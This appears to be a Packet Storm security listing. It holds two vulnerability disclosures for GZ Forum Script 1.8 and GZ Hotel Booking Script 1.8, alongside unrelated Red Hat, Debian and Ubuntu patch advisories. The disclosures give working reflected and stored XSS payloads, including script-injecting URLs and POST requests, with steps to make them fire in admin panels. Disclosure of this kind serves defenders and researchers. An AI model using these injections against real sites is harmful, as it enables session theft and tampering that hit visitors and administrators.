GZ Forum Script version 1.8 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : https://gzscripts.com/gz-forum-script.html                                 │  
│  Vendor   : GZ Scripts                                                                 │  
│  Software : GZ Forum Script 1.8                                                        │  
│  Vuln Type: Reflected XSS - Stored XSS                                                 │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│                                                                                        │  
│  Reflected XSS                                                                         │  
│                                                                                        │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
│                                                                                        │  
│  Stored XSS                                                                            │  
│                                                                                        │  
│  Allow Attacker to inject malicious code into website, give ability to steal sensitive │  
│  information, manipulate data, and launch additional attacks.                          │  
│                                                                                        │     
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09  

         CryptoJob (Twitter) twitter.com/0x0CryptoJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /preview.php

GET 'catid' parameter is vulnerable to RXSS

http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a

Path: /preview.php

GET 'topicid' parameter is vulnerable to RXSS

http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2

## Stored XSS

-----------------------------------------------  
POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1

-----------------------------39829578812616571248381709325  
Content-Disposition: form-data; name="free_name"

<script>alert(1)</script>  
-----------------------------39829578812616571248381709325  
Content-Disposition: form-data; name="topic"

<script>alert(1)</script>  
-----------------------------39829578812616571248381709325  
Content-Disposition: form-data; name="topic_message"

<script>alert(1)</script>  
-----------------------------39829578812616571248381709325--

-----------------------------------------------

POST parameter 'free_name' is vulnerable to XSS  
POST parameter 'topic' is vulnerable to XSS  
POST parameter 'topic_message' is vulnerable to XSS

## Steps to Reproduce:

1. As a [Guest User] Click on [New Topic] to create a "New Topic" on this Path (http://website/preview.php?controller=Load&action=start_new_topic)  
2. Inject your [XSS Payload] in "Name"  
3. Inject your [XSS Payload] in "Topic Title "  
4. Inject your [XSS Payload] in "Topic Message"  
5. Submit

4. XSS Fired on Visitor Browser's when they Visit the Topic you Infect your [XSS Payload] on

5. XSS Fired on ADMIN Browser when he visit [Dashboard] in Administration Panel on this Path (https://website/GzAdmin/dashboard)  
6. XSS Fired on ADMIN Browser when he visit [Topic] & [All Topics] to check [New Topics] on this Path (https://website/GzTopic/index)

[-] Done

GZ Forum Script 1.8 Cross Site Scripting

Red Hat Security Advisory 2023-3950-01 - The Open Virtual Machine Tools are the open source implementation of the VMware Tools. They are a set of guest operating system virtualization components that enhance performance and user experience of virtual machines. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Low: open-vm-tools security update  
Advisory ID:       RHSA-2023:3950-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3950  
Issue date:        2023-06-29  
CVE Names:         CVE-2023-20867   
=====================================================================

1. Summary:

An update for open-vm-tools is now available for Red Hat Enterprise Linux  
8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - x86_64

3. Description:

The Open Virtual Machine Tools are the open source implementation of the  
VMware Tools. They are a set of guest operating system virtualization  
components that enhance performance and user experience of virtual  
machines.

Security Fix(es):

* open-vm-tools: authentication bypass vulnerability in the vgauth module  
(CVE-2023-20867)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2213087 - CVE-2023-20867 open-vm-tools: authentication bypass vulnerability in the vgauth module

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
open-vm-tools-11.3.5-1.el8_6.2.src.rpm

x86_64:  
open-vm-tools-11.3.5-1.el8_6.2.x86_64.rpm  
open-vm-tools-debuginfo-11.3.5-1.el8_6.2.x86_64.rpm  
open-vm-tools-debugsource-11.3.5-1.el8_6.2.x86_64.rpm  
open-vm-tools-desktop-11.3.5-1.el8_6.2.x86_64.rpm  
open-vm-tools-desktop-debuginfo-11.3.5-1.el8_6.2.x86_64.rpm  
open-vm-tools-sdmp-11.3.5-1.el8_6.2.x86_64.rpm  
open-vm-tools-sdmp-debuginfo-11.3.5-1.el8_6.2.x86_64.rpm  
open-vm-tools-test-debuginfo-11.3.5-1.el8_6.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-20867  
https://access.redhat.com/security/updates/classification/#low

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJ2otNzjgjWX9erEAQj7Fg/+OqllJsOUa9C16ghEetmzCRAt1PP1rzdS  
gj0SyYrTe8YuRY6fI/u810X6x9KQQZPq8HuuK9mgZHJ52NHifkl29TbPDaOzQoq1  
5GKjd7QNcoPYM7bMv+bYfVnirypZ6j9GYjODYxV2tmFOqSXIpDkXLNZTfcytSxGO  
73G6v7ktqcbVZn7JvSLhsPbk4roa6uwSkecKZT5Edah0AAPM8GxvlRMIL1S79KR/  
ahuRSFGB0H7n+/5a8gI6g/fMniv/SbNRboTFzYlvPHWVigoPXdBlR4JcCnYX6Kk/  
ZF0l9oHF5M5aTC62lX5cqMo70WwVNn5Y53KZYsFUGAmjU2n5Lah6OZJzkHNCQQWl  
eBJL4FIwUKbwYf9ULr1OWfrCjMf0CFR/b+5NV6ukjI9hz/iW31fGpj2bPjxjuMmj  
kEEPIMRqGbBg42WgILUFz0FybxhMkTrwL6rq1A9yZ17W0ZU57DwOdHRkKeSh313d  
1oZ5dJf4/AijGwyUByQK8gXmyYjC8aCKHw3GJN3zhrGxnfu78+zJYtr7O1pblBzb  
Jh4E7alyGRPW4aOglT8GZ2zKixGki7/5068GL1usSdSDTYhpFM5xoulbTZFYYcub  
OKaaZxolhTVed8EmHEani/9u6E4Az2Q0LJ/Lkf1JCVoMTnmtdLNmAMxZA9ZxEZUW  
Gj+mJnO4NJI=  
=74uu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3950-01

Debian Linux Security Advisory 5441-1 - Two vulnerabilities were found in maradns, an open source domain name system (DNS) implementation, that may lead to denial of service and unintended domain name resolution.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5441-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuJune 29, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : maradnsCVE ID         : CVE-2022-30256 CVE-2023-31137Debian Bug     : 1033252 1035936Brief introduction Two vulnerbilities were found in maradns, an open source domain namesystem (DNS) implementation, that may lead to denial of service andunintended domain name resolution.For the oldstable distribution (bullseye), these problems have been fixedin version 2.0.13-1.4+deb11u1.We recommend that you upgrade your maradns packages.For the detailed security status of maradns please refer toits security tracker page at:https://security-tracker.debian.org/tracker/maradnsFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmSc6j4ACgkQO1LKKgqv2VSQLgf/Tn5pYOeHQDp4pK8nzpQ4FgIZkbxmsjvuzT3SEX637sDWz2hAfbeIWxjww0KbZnkdQIkPOWh6s5jZ3W4hvU7S+nhPjGiU88PXvGAyYItvU2QfaEXWzy4wwLBlPfuh8CiVJxREyvEk9sjZCGr/VqwQyY0ttYqbkpmx0cscm7MpdWBa7WsFFh19bNXUD3tWs0RPH0V5HNOwuBiay0uFh0V2o4PAssR8qaYeDfW2QQT5i1uf2wyW+Bq7IYUsxvMUKo3iRPQ9pX/nnpj0+ZyG/Mtn6tI8F0gMt/LS6LiAyQz/D7EdBguUJ56LZ/oniquCYAyAfnDwNRat66CEEpZpMXN0Xw===eb0N-----END PGP SIGNATURE-----

Debian Security Advisory 5441-1

Ubuntu Security Notice 6191-1 - USN-6081-1, USN-6084-1, USN-6092-1 and USN-6095-1 fixed vulnerabilities in the Linux kernel. Unfortunately, that update introduced a spurious warning in the IPv6 subsystem. This update removes the undesired warning message.

    ==========================================================================Ubuntu Security Notice USN-6191-1June 29, 2023linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15,linux-dell300x, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm,linux-oracle, linux-raspi2, linux-snapdragon regression==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:The system could show undesired warning messages in certain conditions.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems- linux-dell300x: Linux kernel for Dell 300x platforms- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi2: Linux kernel for Raspberry Pi systems- linux-snapdragon: Linux kernel for Qualcomm Snapdragon processors- linux-aws-hwe: Linux kernel for Amazon Web Services (AWS-HWE) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe: Linux hardware enablement (HWE) kernelDetails:USN-6081-1, USN-6084-1, USN-6092-1 and USN-6095-1 fixed vulnerabilities inthe Linux kernel. Unfortunately, that update introduced a spurious warningin the IPv6 subsystem. This update removes the undesired warning message.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS:   linux-image-4.15.0-1067-dell300x  4.15.0-1067.72   linux-image-4.15.0-1121-oracle  4.15.0-1121.132   linux-image-4.15.0-1134-raspi2  4.15.0-1134.142   linux-image-4.15.0-1142-kvm     4.15.0-1142.147   linux-image-4.15.0-1151-gcp     4.15.0-1151.167   linux-image-4.15.0-1152-snapdragon  4.15.0-1152.162   linux-image-4.15.0-1158-aws     4.15.0-1158.171   linux-image-4.15.0-1167-azure   4.15.0-1167.182   linux-image-4.15.0-213-generic  4.15.0-213.224   linux-image-4.15.0-213-generic-lpae  4.15.0-213.224   linux-image-4.15.0-213-lowlatency  4.15.0-213.224   linux-image-aws-lts-18.04       4.15.0.1158.156   linux-image-azure-lts-18.04     4.15.0.1167.135   linux-image-dell300x            4.15.0.1067.66   linux-image-gcp-lts-18.04       4.15.0.1151.165   linux-image-generic             4.15.0.213.196   linux-image-generic-lpae        4.15.0.213.196   linux-image-kvm                 4.15.0.1142.133   linux-image-lowlatency          4.15.0.213.196   linux-image-oracle-lts-18.04    4.15.0.1121.126   linux-image-raspi2              4.15.0.1134.129   linux-image-snapdragon          4.15.0.1152.151   linux-image-virtual             4.15.0.213.196Ubuntu 16.04 LTS (Available with Ubuntu Pro):   linux-image-4.15.0-1121-oracle  4.15.0-1121.132~16.04.1   linux-image-4.15.0-1152-gcp     4.15.0-1152.168~16.04.1   linux-image-4.15.0-1158-aws     4.15.0-1158.171~16.04.1   linux-image-4.15.0-1167-azure   4.15.0-1167.182~16.04.1   linux-image-4.15.0-213-generic  4.15.0-213.224~16.04.1   linux-image-4.15.0-213-lowlatency  4.15.0-213.224~16.04.1   linux-image-aws-hwe             4.15.0.1158.141   linux-image-azure               4.15.0.1167.151   linux-image-gcp                 4.15.0.1152.142   linux-image-generic-hwe-16.04   4.15.0.213.198   linux-image-gke                 4.15.0.1152.142   linux-image-lowlatency-hwe-16.04  4.15.0.213.198   linux-image-oem                 4.15.0.213.198   linux-image-oracle              4.15.0.1121.102   linux-image-virtual-hwe-16.04   4.15.0.213.198After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://launchpad.net/bugs/2020279   https://ubuntu.com/security/notices/USN-6191-1Package Information:   https://launchpad.net/ubuntu/+source/linux/4.15.0-213.224   https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1158.171   https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1167.182   https://launchpad.net/ubuntu/+source/linux-dell300x/4.15.0-1067.72   https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1151.167   https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1142.147   https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1121.132   https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1134.142   https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1152.162

Ubuntu Security Notice USN-6191-1

GZ Hotel Booking Script version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/php-gz-hotel-booking-script.html                     ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ Hotel Booking Script 1.8                                                ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /PHPGZHotelBooking/load.php?controller=GzFront&action=booking_details HTTP/1.1first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&terms=1&date_range=29.06.2023+-+30.06.2023&date_to=30.06.2023&date_from=29.06.2023&adults=1&children=1&order=&sort=&fromNumber=&toNumber=&room_id%5B4%5D=1&room_id%5B3%5D=0&room_id%5B2%5D=0&room_id%5B1%5D=0&adults_arr%5B4%5D%5B1%5D=1&children_arr%5B4%5D%5B1%5D=1-----------------------------------------------POST parameter 'first_name' is vulnerable to XSSPOST parameter 'second_name' is vulnerable to XSSPOST parameter 'phone' is vulnerable to XSSPOST parameter 'address_1' is vulnerable to XSSPOST parameter 'country' is vulnerable to XSS## Steps to Reproduce:1. As a [Guest User] Choose any [Room] for Booking2. Inject your [XSS Payload] in "First Name"3. Inject your [XSS Payload] in "Last Name"4. Inject your [XSS Payload] in "Phone"5. Inject your [XSS Payload] in "Address Line 1"6. Inject your [XSS Payload] in "Country"7. Accept with terms & Press [Booking]   XSS Fired on Local User Browser8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)   XSS Will Fire and Executed on his Browser9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)   XSS Will Fire and Executed on his Browser   10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)      [-] Done

Source

Packet Storm